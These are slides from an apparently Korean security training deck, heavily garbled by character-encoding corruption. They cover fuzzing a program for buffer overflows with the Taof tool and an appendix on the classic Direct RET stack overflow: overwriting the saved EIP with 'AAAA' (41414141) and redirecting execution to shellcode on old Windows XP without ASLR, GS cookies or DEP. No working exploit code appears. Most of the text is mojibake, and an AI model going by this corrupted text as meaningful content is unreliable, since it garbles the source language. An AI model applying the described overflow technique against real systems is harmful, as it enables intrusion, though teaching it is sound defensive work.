์ ์ถ์ถ๋ ๋คํ 40E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ
41.
41 โข Taof debugging
data โข toaf fuzzer๋ BOF ์ ๊ฒ ์ A๋ฅผ ์ฌ์ฉ โข 240 ๋ฌธ์์ด ์ฝ์ ์ด์ ๊ฒฐ๊ณผ ๏ File not found โข 255 ๋ฌธ์์ด ์ฝ์ ์ดํ ๊ฒฐ๊ณผ ๏ Exception ๋ฐ์ E-mail: isc0304@naver.com Writing by Ilsun Choi 3. ๋ชจ์์ค์ต > 2) ๋ฒํผ์ค๋ฒํ๋ก์ฐ ์ ๊ฒ
42.
๋ถ๋ก. Direct RET
BoF ๏ถ ๋ค์๊ณผ ๊ฐ์ ํ๊ฒฝ์๋ง ๊ฐ๋ฅํ ๊ธฐ๋ฒ์ด๋ค. - Windows XP ๊ธ ๊ธฐ๋ฐ(ASLR ๊ธฐ๋ฐ OS๋ ์คํํ๊ธฐ ์ด๋ ค์) - GS-Cookie ๋ฏธ์ค์ - DEP ๋ฏธ์ค์ ๏ถ ์ด๋ฏธ์ง๋ ์๋ ๋ธ๋ก๊ทธ๋ฅผ ์ฐธ๊ณ ํ์๋ค. http://fehead.tistory.com/201 42E-mail: isc0304@naver.com Writing by Ilsun Choi
43.
43 โข main() ํจ์์์
A() ํจ์ ํธ์ถ ์ ์คํ ๋ณํ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
44.
โข 98๋ฒ ์ฃผ์์
main()์์์ EIP ์ ์ฅ 44E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
45.
โข 97๋ฒ ์ฃผ์์
main()์์์ EBP ์ ์ฅ 45E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
46.
โข A() ํจ์
์คํ ์์ฑ 46E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
47.
โข C/C++ ๋ฑ์์์
๋ฌธ์์ด ์ ์ฅ๋ฐฉ์ ๏ ์ ์ฃผ์ ์ง์ ๏ null์ด ๋ฑ์ฅํ ๋๊น์ง ์ฑ์ 47 ๋ฌธ์์ด ์ ๋ ฅ ๋ฌธ์์ด์์ฑ์ฐ๋๋ฐฉํฅ RET ๋ณ์กฐ ์ํ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
48.
48 ์ ์ฝ๋ ์ ๋ ฅ ๋ณ์กฐ๋
RET โข RET๊ฐ ์ ์ฝ๋๋ฅผ ๊ฐ๋ฆฌํด ๏ ์ ์ฝ๋ ์คํ โข RET(EIP)์ EBP์ โ41414141โ์ด ์ ๋ ฅ๋จ ๏ ๋ณ์กฐ ๊ฐ๋ฅ E-mail: isc0304@naver.com Writing by Ilsun Choi ๋ถ๋ก. Direct RET BoF
49.
์ฐธ๊ณ ๋ฌธํ โข http://fehead.tistory.com/201 โข http://cafe.naver.com/sec/13325 โข
http://www.boannews.com/media/view.asp?idx=45812 โข ์น ๋ชจ์ํดํน๊ณผ ์ํ์ด ์ฝ๋ฉ ์ง๋จ ๊ฐ์ด๋ ์ต๊ฒฝ์ฒ ์ธ ์ง์ E-mail: isc0304@naver.com Writing by Ilsun Choi 49
Download